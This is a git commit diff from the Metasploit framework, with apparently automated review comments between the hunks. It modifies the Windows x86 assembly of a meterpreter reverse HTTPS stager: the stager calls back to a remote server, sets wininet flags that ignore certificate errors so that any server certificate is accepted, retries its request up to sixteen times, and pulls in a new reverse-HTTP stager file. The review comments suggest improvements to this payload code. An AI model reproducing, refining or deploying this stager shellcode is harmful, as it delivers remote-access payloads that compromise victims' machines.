Merge in recent meterpreter work. These are not the commits you are looking for (more info on what all this is later this week).

git-svn-id: file:///home/svn/framework3/trunk@13053 4d416f70-5f16-0410-b530-b9f4589650da
HD Moore
2011-06-28 21:26:43 +00:00
parent dc1e42af2c
commit 9220506ba2
38 changed files with 742 additions and 856 deletions
@@ -23,7 +23,7 @@ internetopen:
push edi ; LPCTSTR lpszProxyBypass
push edi ; LPCTSTR lpszProxyName
push edi ; DWORD dwAccessType (PRECONFIG = 0)
push esi ; LPCTSTR lpszAgent
push esi ; LPCTSTR lpszAgent ("wininet\x00")
push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" )
call ebp
@@ -49,10 +49,9 @@ httpopenrequest:
pop ecx
xor edx, edx ; NULL
push edx ; dwContext (NULL)
push (0x80000000 | 0x04000000 | 0x00800000 | 0x00400000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags
push (0x80000000 | 0x04000000 | 0x00800000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags
;0x80000000 | ; INTERNET_FLAG_RELOAD
;0x04000000 | ; INTERNET_NO_CACHE_WRITE
;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION
;0x00800000 | ; INTERNET_FLAG_SECURE
;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
;0x00001000 | ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
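Review bot: The commented flag breakdown still lists `;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION` although the new dwFlags constant pushed on the line above drops 0x00400000, so the comment no longer describes the value the code uses. Either delete that comment line or turn it into a note on why keep-alive was removed, e.g. `; (0x00400000 INTERNET_FLAG_KEEP_CONNECTION deliberately not set)`, so the next reader can reconcile the mask with the list. The breakdown continues past the end of this hunk, so the remaining lines should be checked against the new mask as well.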
@@ -69,9 +68,20 @@ httpopenrequest:
mov esi, eax ; hHttpRequest
set_retry:
push byte 0x02
push byte 0x10
pop ebx
; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) );
set_security_options:
push 0x00003380
mov eax, esp
push byte 4 ; sizeof(dwFlags)
push eax ; &dwFlags
push byte 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
push esi ; hRequest
push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" )
call ebp
httpsendrequest:
xor edi, edi
push edi ; optional length
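Review bot: `push 0x00003380` in set_security_options is the one magic number in this file without a breakdown comment, while the dwFlags push a few lines up gets one per bit; the value is the OR of the wininet.h SECURITY_FLAG_IGNORE_* bits 0x2000 (CERT_DATE_INVALID), 0x1000 (CERT_CN_INVALID), 0x0200 (WRONG_USAGE), 0x0100 (UNKNOWN_CA) and 0x0080 (REVOCATION), and a comment to that effect would make the TLS-validation posture of the stager auditable at a glance, e.g. `push 0x00003380 ; dwFlags = SECURITY_FLAG_IGNORE_{CERT_DATE_INVALID|CERT_CN_INVALID|WRONG_USAGE|UNKNOWN_CA|REVOCATION}`. The retry counter in set_retry also changed from 0x02 to 0x10 with no comment; `pop ebx ; ebx = remaining send attempts (16)` would record the intent. Note that this block is now entered once per attempt (the retry path in the following hunk jumps back here), and the dwFlags dword it pushes is never popped, so the comment should also say the temporary is intentionally left on the stack.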
@@ -84,35 +94,10 @@ httpsendrequest:
test eax,eax
jnz short allocate_memory
check_ssl:
; In the case of an invalid certificate authority, we have to wait until the error occurs,
; set an option to disable it, then try it all over again. This wastes shellcode space,
; but its required to use this payload without a valid signed cert.
; push 0x5DE2C5AA ; hash( "kernel32.dll", "GetLastError" )
; call ebp
; cmp al, 0x0d ; ERROR_INTERNET_INVALID_CA (0x2f0d)
; Instead of wasting more bytes on GetLastError (which isn't resolving properly on Windows XP),
; we just try a second time if the initial send fails. This provides us with a real retry
; mechanism for free.
try_it_again:
dec ebx
jz failure
; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) );
set_security_options:
push 0x00003380
mov eax, esp
push byte 4 ; sizeof(dwFlags)
push eax ; &dwFlags
push byte 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
push esi ; hRequest
push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" )
call ebp
; pop eax ; clear temporary storage (optional)
; Try it again
jmp short httpsendrequest
jmp short set_security_options
dbl_get_server_host:
jmp get_server_host
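Review bot: The new `jmp short set_security_options` at try_it_again re-enters the block that does `push 0x00003380` for the dwFlags temporary, and nothing pops it, so each failed HttpSendRequest leaves one more dword on the stack; with the counter raised to 0x10 in the previous hunk that is up to 15 stale dwords, where the old flow pushed it at most once. The commented `; pop eax ; clear temporary storage (optional)` that documented this was removed along with the old block, so the drift is now unmentioned anywhere. Assuming api_call leaves the caller's stack balanced, as the rest of the stager relies on, `pop eax ; drop previous dwFlags temp` placed just before the jmp would keep esp stable across retries; otherwise a comment at try_it_again noting the bounded stack growth is the minimum. The httpsendrequest sequence this retries starts in the previous hunk and the `failure` label is outside this one.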
@@ -0,0 +1,19 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (24 July 2009)
; Size: 274 bytes
; Build: >build.py stager_reverse_tcp_nx
;-----------------------------------------------------------------------------;
[BITS 32]
[ORG 0]
cld ; Clear the direction flag.
call start ; Call start, this pushes the address of 'api_call' onto the stack.
%include "./src/block/block_api.asm"
start: ;
pop ebp ; pop off the address of 'api_call' for calling later.
%include "./src/block/block_reverse_http.asm"
; By here we will have performed the reverse_tcp connection and EDI will be our socket.